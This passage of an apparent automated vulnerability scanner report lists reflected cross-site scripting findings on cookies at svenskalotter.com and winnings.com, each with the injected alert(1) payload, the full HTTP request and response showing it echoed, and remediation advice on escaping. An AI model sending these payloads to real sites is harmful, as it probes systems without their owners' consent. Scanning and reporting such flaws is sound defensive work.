Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:34 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMb7950"-alert(1)-"32888f9fa48";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.454. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/ [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /click/Svenskalotter.com/SWE/Home/

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88356"-alert(1)-"e9826c072e5 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, every character of the value outside the set [A-Za-z0-9] should be encoded as a JavaScript escape (\xHH or \uHHHH) before it is placed in the string literal; escaping quotes alone is not enough, because a </script> sequence inside the literal still ends the script element.

Request

GET /click/Svenskalotter.com/SWE/Home/ HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM88356"-alert(1)-"e9826c072e5; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: BO=FM88356"-alert(1)-"e9826c072e5; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34629


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM88356"-alert(1)-"e9826c072e5";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.455. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/ [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /click/Svenskalotter.com/SWE/Home/

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb647"-alert(1)-"81471023241 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, every character of the value outside the set [A-Za-z0-9] should be encoded as a JavaScript escape (\xHH or \uHHHH) before it is placed in the string literal; escaping quotes alone is not enough, because a </script> sequence inside the literal still ends the script element.

Request

GET /click/Svenskalotter.com/SWE/Home/ HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PMbb647"-alert(1)-"81471023241; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMbb647"-alert(1)-"81471023241; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:00 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:00 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:00 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:00 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:00 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34629


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMbb647"-alert(1)-"81471023241";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.456. http://www.winnings.com/how-to-win-money [winnings[sessionId] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /how-to-win-money

Issue detail

The value of the winnings[sessionId] cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff193</script><script>alert(1)</script>b44d02d0aa1 was submitted in the winnings[sessionId] cookie. This input was echoed unmodified in the application's response. The payload does not need to close the string literal: the HTML parser ends a script element at the first </script> sequence regardless of JavaScript string state, so escaping quotes alone would not prevent this; the < and / characters must be encoded as well.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, every character of the value outside the set [A-Za-z0-9] should be encoded as a JavaScript escape (\xHH or \uHHHH) before it is placed in the string literal; escaping quotes alone is not enough, because a </script> sequence inside the literal still ends the script element.

Request

GET /how-to-win-money HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733ff193</script><script>alert(1)</script>b44d02d0aa1; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:43:45 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:43:45 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:43:47 GMT
Connection: close
Content-Length: 22360

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<title>Cash Prizes - Learn how to make money online | H
...[SNIP]...
', ' + gid;gid = '&GID=' + gid;}window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?BD=info.Winnings.com&SDN=Winnings.com&LNG=~ENG&CUR=GBP&CSI=21' + gid + prd + '&BO=FM&PAR=103122733ff193</script><script>alert(1)</script>b44d02d0aa1' + ph + '1x10', winName, urlParms);var domain = document.domain;try {var myTracker=_gat._getTrackerByName();_gaq.push(['_trackEvent', 'Outgoing Links '+domain, 'flashclick ('+flashclickParams+')']);}
...[SNIP]...

3.457. http://www.winnings.com/how-to-win-money [winnings[vid] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /how-to-win-money

Issue detail

The value of the winnings[vid] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 796da"><script>alert(1)</script>021a26d9653 was submitted in the winnings[vid] cookie. This input was echoed as 796da\"><script>alert(1)</script>021a26d9653 in the application's response. The backslash placed before the quote is addslashes-style escaping and has no meaning to the HTML parser: the double quote still terminates the attribute value, so the injected tag is rendered as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /how-to-win-money HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129796da"><script>alert(1)</script>021a26d9653; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:39:18 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:39:18 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:39:20 GMT
Connection: close
Content-Length: 22304

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<title>Cash Prizes - Learn how to make money online | H
...[SNIP]...
<a class="cssMenui" href="http://www.vincite.net/how-to-win-money?vid=540129796da\"><script>alert(1)</script>021a26d9653">
...[SNIP]...

3.458. http://www.winnings.com/instant-games [winnings[sessionId] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /instant-games

Issue detail

The value of the winnings[sessionId] cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dacc</script><script>alert(1)</script>7e9442ab16a was submitted in the winnings[sessionId] cookie. This input was echoed unmodified in the application's response. The payload does not need to close the string literal: the HTML parser ends a script element at the first </script> sequence regardless of JavaScript string state, so escaping quotes alone would not prevent this; the < and / characters must be encoded as well.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, every character of the value outside the set [A-Za-z0-9] should be encoded as a JavaScript escape (\xHH or \uHHHH) before it is placed in the string literal; escaping quotes alone is not enough, because a </script> sequence inside the literal still ends the script element.

Request

GET /instant-games HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=1031227338dacc</script><script>alert(1)</script>7e9442ab16a; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:43:38 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:43:38 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:43:40 GMT
Connection: close
Content-Length: 24674

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Money Games Online ... Instant Win Games - Win Real Money..| Winnings.com</title>
<link rel="alternate" type
...[SNIP]...
', ' + gid;gid = '&GID=' + gid;}window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?BD=info.Winnings.com&SDN=Winnings.com&LNG=~ENG&CUR=GBP&CSI=21' + gid + prd + '&BO=FM&PAR=1031227338dacc</script><script>alert(1)</script>7e9442ab16a' + ph + '1x10', winName, urlParms);var domain = document.domain;try {var myTracker=_gat._getTrackerByName();_gaq.push(['_trackEvent', 'Outgoing Links '+domain, 'flashclick ('+flashclickParams+')']);}
...[SNIP]...

3.459. http://www.winnings.com/instant-games [winnings[sessionId] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /instant-games

Issue detail

The value of the winnings[sessionId] cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bce98'><script>alert(1)</script>057a674d681 was submitted in the winnings[sessionId] cookie. This input was echoed as bce98\'><script>alert(1)</script>057a674d681 in the application's response. The backslash placed before the quote is addslashes-style escaping and has no meaning to the HTML parser: the single quote still terminates the attribute value, so the injected tag is rendered as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /instant-games HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=bce98'><script>alert(1)</script>057a674d681; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:41:25 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:41:25 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:41:28 GMT
Connection: close
Content-Length: 24629

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Money Games Online ... Instant Win Games - Win Real Money..| Winnings.com</title>
<link rel="alternate" type
...[SNIP]...
<iframe style='display:none' src='http://www.info.winnings.com/visit.aspx?csi=21&par=bce98\'><script>alert(1)</script>057a674d681IP1x10&CurrencyCode=gbp

' border='0' height='1' width='1' bgcolor='#999999' frameborder='0'>
...[SNIP]...

3.460. http://www.winnings.com/instant-games [winnings[vid] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /instant-games

Issue detail

The value of the winnings[vid] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd4e1"><script>alert(1)</script>b0f4b3ba38f was submitted in the winnings[vid] cookie. This input was echoed as cd4e1\"><script>alert(1)</script>b0f4b3ba38f in the application's response. The backslash placed before the quote is addslashes-style escaping and has no meaning to the HTML parser: the double quote still terminates the attribute value, so the injected tag is rendered as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /instant-games HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129cd4e1"><script>alert(1)</script>b0f4b3ba38f; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:38:37 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:38:37 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:38:38 GMT
Connection: close
Content-Length: 24568

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Money Games Online ... Instant Win Games - Win Real Money..| Winnings.com</title>
<link rel="alternate" type
...[SNIP]...
<a class="cssMenui" href="http://www.vincite.net/instant-games?vid=540129cd4e1\"><script>alert(1)</script>b0f4b3ba38f">
...[SNIP]...

3.461. http://www.winnings.com/lottery-scratch-cards [winnings[sessionId] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /lottery-scratch-cards

Issue detail

The value of the winnings[sessionId] cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 374e4</script><script>alert(1)</script>301043e4eec was submitted in the winnings[sessionId] cookie. This input was echoed unmodified in the application's response. The payload does not need to close the string literal: the HTML parser ends a script element at the first </script> sequence regardless of JavaScript string state, so escaping quotes alone would not prevent this; the < and / characters must be encoded as well.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, every character of the value outside the set [A-Za-z0-9] should be encoded as a JavaScript escape (\xHH or \uHHHH) before it is placed in the string literal; escaping quotes alone is not enough, because a </script> sequence inside the literal still ends the script element.

Request

GET /lottery-scratch-cards HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733374e4</script><script>alert(1)</script>301043e4eec; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:43:31 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:43:31 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:43:33 GMT
Connection: close
Content-Length: 22517

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<title>Lottery scratch cards - Lottery Scratchcards Gam
...[SNIP]...
', ' + gid;gid = '&GID=' + gid;}window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?BD=info.Winnings.com&SDN=Winnings.com&LNG=~ENG&CUR=GBP&CSI=21' + gid + prd + '&BO=FM&PAR=103122733374e4</script><script>alert(1)</script>301043e4eec' + ph + '1x10', winName, urlParms);var domain = document.domain;try {var myTracker=_gat._getTrackerByName();_gaq.push(['_trackEvent', 'Outgoing Links '+domain, 'flashclick ('+flashclickParams+')']);}
...[SNIP]...

3.462. http://www.winnings.com/lottery-scratch-cards [winnings[vid] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /lottery-scratch-cards

Issue detail

The value of the winnings[vid] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f0d8"><script>alert(1)</script>6a70eac04a5 was submitted in the winnings[vid] cookie. This input was echoed as 8f0d8\"><script>alert(1)</script>6a70eac04a5 in the application's response. The backslash placed before the quote is addslashes-style escaping and has no meaning to the HTML parser: the double quote still terminates the attribute value, so the injected tag is rendered as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /lottery-scratch-cards HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=5401298f0d8"><script>alert(1)</script>6a70eac04a5; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:39:21 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:39:21 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:39:22 GMT
Connection: close
Content-Length: 22461

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<title>Lottery scratch cards - Lottery Scratchcards Gam
...[SNIP]...
<a class="cssMenui" href="http://www.vincite.net/lottery-scratch-cards?vid=5401298f0d8\"><script>alert(1)</script>6a70eac04a5">
...[SNIP]...

3.463. http://www.winnings.com/scratch-cards [winnings[sessionId] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /scratch-cards

Issue detail

The value of the winnings[sessionId] cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 811ff</script><script>alert(1)</script>e5827f88a7b was submitted in the winnings[sessionId] cookie. This input was echoed unmodified in the application's response. The payload does not need to close the string literal: the HTML parser ends a script element at the first </script> sequence regardless of JavaScript string state, so escaping quotes alone would not prevent this; the < and / characters must be encoded as well.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, every character of the value outside the set [A-Za-z0-9] should be encoded as a JavaScript escape (\xHH or \uHHHH) before it is placed in the string literal; escaping quotes alone is not enough, because a </script> sequence inside the literal still ends the script element.

Request

GET /scratch-cards HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733811ff</script><script>alert(1)</script>e5827f88a7b; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:43:57 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:43:57 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:43:58 GMT
Connection: close
Content-Length: 24995

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Online Scratch Cards ... Scratch and Win Huge Cash Prizes..| Winnings.com</title>
<link rel="alternate" type
...[SNIP]...
', ' + gid;gid = '&GID=' + gid;}window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?BD=info.Winnings.com&SDN=Winnings.com&LNG=~ENG&CUR=GBP&CSI=21' + gid + prd + '&BO=FM&PAR=103122733811ff</script><script>alert(1)</script>e5827f88a7b' + ph + '1x10', winName, urlParms);var domain = document.domain;try {var myTracker=_gat._getTrackerByName();_gaq.push(['_trackEvent', 'Outgoing Links '+domain, 'flashclick ('+flashclickParams+')']);}
...[SNIP]...

